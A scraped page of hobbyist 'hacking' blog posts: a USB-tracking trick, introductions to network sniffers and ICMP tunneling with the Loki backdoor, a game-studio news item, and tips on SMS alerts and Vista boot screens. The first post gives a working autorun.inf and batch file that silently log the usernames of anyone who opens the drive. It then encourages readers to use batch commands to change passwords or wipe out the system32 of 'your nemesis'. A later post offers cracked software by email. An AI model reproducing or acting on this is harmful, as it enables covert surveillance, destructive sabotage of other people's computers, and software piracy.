Track USB drive users

I got an interesting email from my blog reader Reynold who asked me that how he can track users who used his USB drive after he has given it to someone. He wanted to get the usernames of the accounts where the pendrive was used. I thought for a while and told him that he can achieve this feat either by using Trojans or a combination of Batch and Autorun files. However,you must advise users to not to format the pendrive in order for this to work.The second option of Batch files was easy and less suspicious.So Here is how I made it possible to get the usernames when the pendrive was plugged into the PC -

Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
echo %username%>>users.dat
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

 

NOTE : The Last Line of the code is optional which will open the explorer in a new window.

Save both file and you are good to go. Now whenever a user plugs your pendrive into their PC,it will display an autoplay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear.Now If you go into the root of the drive, you will find a new file called users.dat which will record the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using notepad and view its contents.

However..This is not a fool proof method as some geeks disable the autoplay option (or disable writing to USB drives) ,or they just bypass it by pressing RISHT SHIFT key when the pendrive is connected and hence their name will not be recorded or they can delete the users.dat file. But that said,it will work fine nevertheless :)

NOTE 2 : Umm..I think the above code is way too easy and harmless,why not to get creative and create a batch file which will even change the password ?(DOS NET commands) or even wipe out system32 of your nemesis (cacls command) ?

 

Keep Learning friends..I mean it :P

 

POSTED BY XERO . ALL RIGHTS RESERVED.

Technorati Tags: hacking,tips n tricks,tutorials,how to,rdhacker,prohack,pendrive,track pendrive users,flash drive,security,hacks

read more "Track USB drive users"

Sniffers - An Introduction : Network Sniffers - 2

Sniffers - An Introduction

• Sniffers monitor network data.

• A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming.

• Sniffers usually act as network probes or "snoops" -- examining network traffic but not intercepting or altering it.

• Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels such as the Ethernet frame.

A sniffer is a piece of software that captures the traffic on a network. They are available for several platforms in both commercial and open-source variations. Some of simplest packages use a command line interface and dump captured data to the screen, while sophisticated ones use GUI, graph traffic statistics, track multiple sessions and offer several configuration options.

Sniffers are also the engines for other programs. Network Intrusion Detection Systems (NIDS) use sniffers to match packets against a rule-set designed to flag anything malicious or strange. Network utilization and monitoring programs often use sniffers to gather data necessary for metrics and analysis. It is to be noted that sniffers do not intercept or alter the data it captures.

The most common way of networking computers is through Ethernet. The Ethernet protocol works by broadcasting packets to all hosts on the network, with the packet header containing the MAC address of the machine that is meant to receive the packet. All others are supposed to ignore it. A NIC (Network Interface Card, also known as Ethernet card) that is accepting all packets, regardless of the intended machine is said to be in promiscuous mode. A sniffer is a program that sets the desired NIC into promiscuous mode.

A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network. This is what is known as a passive attack because the attacker does not directly interface with any machine which the attacker may be trying to compromise.

Before we can explore how some sniffing tools are used by attackers towards malicious ends, let us examine what enables the tool to work. However, on a LAN, several PCs share a common connection to the Internet. The devices that come into play here include hubs, switches and routers among others.

A switch performs the layer 2 or Data-Link layer function. That is, it simply looks at each packet or data unit and determines from a physical address (the "MAC address") which device a data unit is intended for and switches it out toward that device. A hub is a place of convergence where data arrives from one or more directions and is forwarded out in one or more other directions. The distinction seems to be that the hub is the place where data comes together and the switch is what determines how and where data is forwarded from the place where data comes together.

If the network is not switched, the traffic destined for any machine on a segment is broadcast to every machine on that segment. This means that a computer actually sees the data traveling to and from each of its neighbors, but ignores it, unless otherwise instructed.

The sniffer program works by asking a computer, specifically its Network Interface Card (NIC), to stop ignoring all the traffic headed to other computers and pay attention to them. It does this by placing the NIC in a state known as promiscuous mode. Once a NIC is promiscuous, (a status that requires administrative or root privileges) a machine can see all the data transmitted on its segment. The program then begins to constantly read all information entering the PC through the network card. A sniffer can therefore peel away the layers of encapsulation and decode the relevant information stored within. This includes information such as source computer, destination computer, targeted port number, payload etc - in short, every piece of information exchanged between two computers.

Security Concern

• Users of computer networks unwittingly disclose sensitive information about themselves through the use of insecure software, and protocols.

• Standard implementations of widely adopted protocols such as Windows file sharing (CIFS/SMB), telnet, POP3, HTTP and FTP transmit login passwords in clear text, exposing an extremely large segment of the internet population to sniffing-related attacks.

A packet sniffer is nefariously known for its ability to "sniff" plain text passwords. On a normal LAN there are thousands of packets being conversed by numerous machines every minute. Therefore, anything transmitted in plaintext, such as passwords, web pages, database queries and messaging over the network will be vulnerable to sniffing.

A sniffer can easily be customized to capture specific traffic like telnet sessions or e-mail. Once network traffic has been captured, an attacker can swiftly extract sensitive information such as logins, passwords and the text of messages to extend their attack. The disturbing part of the entire process is that users may remain clueless about the leakage of information until they are visibly compromised. This is because sniffers cause no damage or disturbance to a network environment.

Data is transmitted in the binary form over the network. Packet sniffers capture binary data passing through the network, and most of them decode this data into a human readable form. Another feature supported by popular sniffers is protocol analysis. This makes it even easier for attackers, as they can target specific protocols in accordance with their intent.

On most sniffers there is a varying degree of the analysis that takes place. This may be simple analysis involving just breaking down the information packet. Others are more complex involving detailed information contained in the packet (i.e., highlights a password for a service). We will explore some sniffers in this module and see the functionality offered by them.

It must be borne in mind that sniffer have beneficial applications as well. In fact, majority of them were designed for legitimate purposes. However, like double edged swords, the end sought by their means lies in the mind of the user.

---Regards,
Amarjit Singh

read more "Sniffers - An Introduction : Network Sniffers - 2"

Network Sniffers - 1

From todays onwards, we will learn about Network Sniffers. Sniffers can be of great help to a network administrator as well and can aid in securing the network by detecting abnormal traffic.

In next few days, we will discuss:

• An overview of sniffers (sometimes known as network protocol analyzers)

• A cracker's perspective in using tools such as sniffers

• Basic distinctions between active and passive sniffing

• Understanding attack methodology such as ARP Spoofing and redirection,

• DNS and IP Sniffing and Spoofing

• HTTPs Sniffing and

• Illustrations of various tools that are used in the above context.

---Regards,

Amarjit Singh

read more "Network Sniffers - 1"

ICMP Tunneling

ICMP Tunneling

• Covert Channels are methods in which an attacker can hide the data in a protocol that is undetectable.

• Covert Channels rely on techniques called tunneling, which allows one protocol to be carried over another protocol.

• ICMP tunneling is a method of using ICMP echo-request and echo-reply as a carrier of any payload an attacker may wish to use, in an attempt to stealthily access, or control a compromised system.

The Internet Control Message Protocol is an adjunct to the IP layer. It is a connectionless protocol used to convey error messages and other information to unicast addresses . ICMP packets are encapsulated inside of IP datagram. The first 4-bytes of the header are same for every ICMP message, with the remainder of the header differing for different ICMP message types. There are 15 different types of ICMP messages.

The ICMP types we are concerned with are type ox8 and type 0x8. ICMP type 0x0 specifies an ICMP_ECHOREPLY (the response) and type 0x8 indicates an ICMP _ECHO (the query). The normal course of action is for a type 0x8 to elicit a type 0x0 response from a listening server. (Normally, this server is actually the OS kernel of the target host. Most ICMP traffic is, by default, handled by the kernel). This is what the ping program does.

The concept of ICMP Tunneling involves arbitrary information tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets and using them to carry the payload.

Covert Channels are methods in which an attacker can hide the data in a protocol that is undetectable. Covert Channels rely on techniques called tunneling, which allows one protocol to be carried over another protocol. A covert channel is a vessel in which information can pass, but this vessel is not ordinarily used for information exchange.

Therefore, as a matter of consequence, covert channels are impossible to detect and deter using a system's normal (read: unmodified) security policy. In theory, almost any process or bit of data can be a covert channel. In practice, it is usually quite difficult to elicit meaningful data from most covert channels in a timely fashion.

This makes it an attractive mode of transmission for a Trojan. The attacker can use the covert channel and install the backdoor on the target machine.

The concept of ICMP Tunneling is simple: arbitrary information tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets. This exploits the covert channel that exists inside of ICMP_ECHO traffic. This channel exists because network devices do not filter the contents of ICMP_ECHO traffic. They simply pass them, drop them, or return them. The Trojan packets themselves are masqueraded as common ICMP_ECHO traffic. We can encapsulate (tunnel) any information we want.

Hacking Tool: Loki

(www.phrack.com)

• Loki was written by daemon9 to provide shell access over ICMP making it much more difficult to detect than TCP or UDP based backdoors.

• As far as the network is concerned, a series of ICMP packets are shot back and forth: Ping, Pong-response. As far as the attacker is concerned, commands can be typed into the loki client and executed on the server.

This program is a working proof-of-concept to demonstrate that data can be transmitted rather stealthily across a network by hiding it in traffic that normally does not contain payloads. The example code in the original Phrack magazine can tunnel the equivalent of a Unix RCMD/RSH session in either ICMP echo request (ping) packets or UDP traffic to the DNS port. This is used as a back door into a UNIX system after root access has been compromised. Presence of LOKI on a system is evidence that the system has been compromised in the past.

Although the payload of ICMP packet is often timing information, there is no check by any device as to the content of the data. So, as it turns out, this amount of data can also be arbitrary in content as well. Therein lies the covert channel. A covert channel is a vessel in which information can pass, but this vessel is not ordinarily used for information exchange. Therefore, covert channels are impossible to detect and deter using a system's normal security policy.

Loki exploits the covert channel that exists inside of ICMP_ECHO traffic. This channel exists because network devices do not filter the contents of ICMP_ECHO traffic. The Trojan packets themselves are masqueraded as common ICMP_ECHO traffic. It can be used as a backdoor into a system by providing a covert method of getting commands executed on a target machine. The LOKI packet with a forged source IP address will arrive at the target (and will elicit a legitimate ICMP_ECHOREPLY, which will travel to the spoofed host, and will be subsequently dropped silently) and can contain the 4-byte IP address of the desired target of the Loki response packets, as well as 51-bytes of malevolent data.

The important aspect of Loki is that routers, firewalls, packet-filters, dual-homed hosts all can serve as conduits for Loki. A surplus of ICMP_ECHOREPLY packets with a garbled payload can be ready indication the channel is in use. The standalone Loki server program can be easily detected. However, if the attacker can keep traffic on the channel down to a minimum, and was to hide the Loki server inside the kernel, detection is almost impossible.

Loki Countermeasures

• Configure your firewall to block ICMP incoming and outgoing echo packets.

• Blocking ICMP will disable ping request and may cause inconvenience to users.

• So you need to carefully decide on security Vs convenience.

• Loki also has the option to run over UDP port 53 (DNS queries and responses.)

■ Disable external ICMP_ECHO traffic entirely. This does have serious implications to normal network management since it does affect network communication management within the local segment. However, this can be configured to allow internal ping traffic and disable packets coming from the outside.

■ Disable ICMP_ECHO_REPLY traffic on a Cisco router. Security implications make this a prudent choice.

■ Ensure that the routers are configured to not send ICMP_UNREACHABLE error packets to hosts that do not respond to ARPs.

---Regards,
Amarjit Singh

read more "ICMP Tunneling"

Duke Nukem Creators 3D Realms Shuts Down

The Duke Nukem maker and the publisher of the highly acclaimed “MAX PAYNE,Wolfenstein 3D,Commandeer Keen”,3D Realms told Shacknews that the company has been shut down. The shutdown will be affecting both 3D realms and the recently resurrected APOGEE.

3D Realms was founded in 1987 by Scott Miller and George Broussard, and was best known for its Duke Nukem series of shooters starring the titular, bubblegum-lacking hero. The studio had infamously been working on Duke Nukem Forever, the next flagship franchise entry, for over 12 years and gave the last big push by releasing a short teaser to Duke in 2007.3D Realms was known for quality in gaming and the easy atmosphere among there employees in gaming.

All the emails to the 3d Realms veterans have gone unanswered and with 3D Realms publishing partner Take-Two and Apogee partner Deep Silver likewise unavailable for comment. 3D Realms webmaster Joe Siegler has remarked by stating: "It's not a marketing thing. It's true. I have nothing further to say at this time." on the shutdown of the company. The root cause was annotated to the discontinued funding of the company on the ongoing projects .The employees have reportedly already been let go and the company is in the process of liquidation. However, luckily, the shutdown of 3D Realms has not affected the development of the upcoming Duke Nukem handheld trilogy, developed at Frontline Games.

That makes one thing worse – Duke Nukem forever release gets more unlikely..sheesh..You can watch the Last Duke Nukem Forever trailer here

 

We loved you 3D realms…

 

Posted By XERO . ALL RIGHTS RESERVED.

Technorati Tags: gaming,technology News,3D realms shuts down,Duke nukem Forever,rdhacker,prohack

read more "Duke Nukem Creators 3D Realms Shuts Down"

Get Email alerts on Your Mobile for FREE

Hi friends..last time I wrote about email alerts,it was only for Gmail users,but recently I stumbled across the wild wild web to find how to get my email alerts on my mobile (an old highly modded LG KG195), and the search was worth my  time. I finally landed to WAY2SMS.COM which allowed me to send free sms all over India and even get email alerts on my mobile for free !!

Way2sms is a sms gateway provider which allows to send free sms across India,the sms are of 140 characters and consists of a 20 character advertisement through which the website covers its costs. Way2sms allows for seamless integration of Gmail, Yahoo accounts and you can chat from right at that site with your friends.

Well,that was a lot about way2sms,now lets learn how we can use to to get free email alerts on mobile -

First register at www.way2sms.com and login into the site.

Now click on Mail tab and create a new way2sms email ID.

After you have created it,login into your Gmail account/Yahoo account or in short Email account :P

Gmail Users

All you have to do is Just link your Gmail account with your Way2SMS account. Here is the way -

• Logon to your Gmail account
• click on settings & then click on ‘FORWARDING/POP/IMAP’ option
• Select “ Forward a copy of incoming mail to “ option & Enter your Way2SMS Email ID there which you just created

• Click On Save
• Finished. You will now receive alerts for every incoming mail that arrives in your Gmail id.

Yahoo Users

You only have to link your yahoo.co.in account with your Way2sms account,here is how you can do that -

• Logon to your Yahoo mail account
• click on Options  & then click on “Mail Options”
• Select “ POP&Forwarding “ option & then Click on 'Setup or Edit POP & Forwarding' link.
• Choose ' Forwarding ' option & Enter your Way2SMS Mail ID

• Click On Save. You will now receive alerts for every incoming mail that arrives in your YAHOO.CO.IN Account.
  

Any Other Email Users

All you have to do is Just forward a copy of your mail to your Way2SMS Mail Id…and you will get free email alerts on your mobile.

 

The only downside of using this service is that you have to reactivate it every 7 days but that's okay as it only takes the click of a button :P

I have been enjoying this service and just want to say that its awesome. You can send sms,create groups,send group sms,get email alerts on your mobile on the go..what else do you want? Why wait,just go ahead and get going ..

 

Keep learning friends

 

POSTED BY XERO .ALL RIGHTS RESERVED. ALL NAMES AND TRADEMARKS BELONG TO THEIR RESPECTIVE OWNERS.

 

Technorati Tags: tutorials,tips n tricks,how to,internet tips and tricks,cellphones and mobiles,mobiles,email,gmail,yahoo,google,rdhacker,prohack,email alerts on mobile

read more "Get Email alerts on Your Mobile for FREE"

Secure Your Passwords Using Double Password

Well…long time ago,folks like me used to have strong passwords,which were rather a cryptic combination of words,numbers,symbols and logic like – “ h4x0rsrul35!! ” and more..and trust me,until you are a 1337speaker (in my case) these passwords are incredibly hard to remember..forgot these,even people tend to forget the simple passwords of their email IDS or that of user accounts,which may be hijacked or keylogged using keyloggers and other malicious software. Imagine having your personal data at stake and gone public due to weak passwords..

If you are a real data enthusiastic,the only logical solution was to buy a secure token,but unfortunately,its expensive and needs a software that has built-in support for this method of authentication.And if you are a geek with no money (like me) then here comes Double Password to the rescue.

Double Password turns any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player, PDA or even a USB-pluggable mobile handset.Double Password, installs onto your flash drive. When you type a password, the program intercepts it and converts it into a super-strong password string on-the-fly. You can use simple, easy-to-remember passwords without the risk of being cracked.

Another benefit of using Double Password is that nobody can steal your passwords. Spy programs are useless. Even if someone gets the "weak" password that you type on the keyboard, it means nothing. This password will only work when your USB flash is inserted.

While typical hardware locks will work only with software that supports secure tokens, Double Password works with any software. It simply substitutes your weak password with a strong one.

Double Password can be effectively used to securely lock your Windows account, to protect your laptop and to bring a new level of security to all software that uses password authentication.

Download Double Password

 

( PS: Need cracks? google them or email me :P )

 

Keep Learning ..

 

POSTED BY XERO.ALL RIGHTS RESERVED.

Technorati Tags: password,downloads,software downloads,how to,consumer,rdhacker,prohack,double password,security

read more "Secure Your Passwords Using Double Password"

Enable Windows Vista Hidden Boot Screen

The Windows Vista BootScreen is pointless,dull and in short – BORING. The guys at Redmond,Microsoft (?) decided to hide a more visually appealing boot screen of Windows Vista for that blank piece of art (?). However,the hidden boot  screen can be easily enabled in Windows Vista in full glory and with very little trouble. I'm not sure why they didn't make the boot screen better but I think they wanted to give Windows users a surprise what Vista be hiding underneath (which failed miserably). Seriously,If you really want a better boot screen, you can check out my article on creating a custom boot logo which is easy to pick and good to go :) here 

For the time being,here is how you can enable the hidden boot screen in Windows Vista -

Now..Here's the default boot screen:

And here's the hidden one, called "Aurora" (Nice name..)

For enabling it,all you have to do is type msconfig into the start menu search box, and hit enter.

Now navigate to boot tab,and then check the "No GUI boot" checkbox.

Hit OK and reboot the computer. You should see the new boot screen immediately on restart.

Note: You may get a Windows Defender error on the next startup. You can enable the system config utility using the tray icon and this error will go away.

 

Keep Learning :)

 

POSTED BY XERO.HOW TO GEEK.SOURCE.ALL RIGHTS RESERVED.

Technorati Tags: windows vista,vista,how to,rdhacker,prohack,tips n tricks,hidden boot screen,windows

read more "Enable Windows Vista Hidden Boot Screen"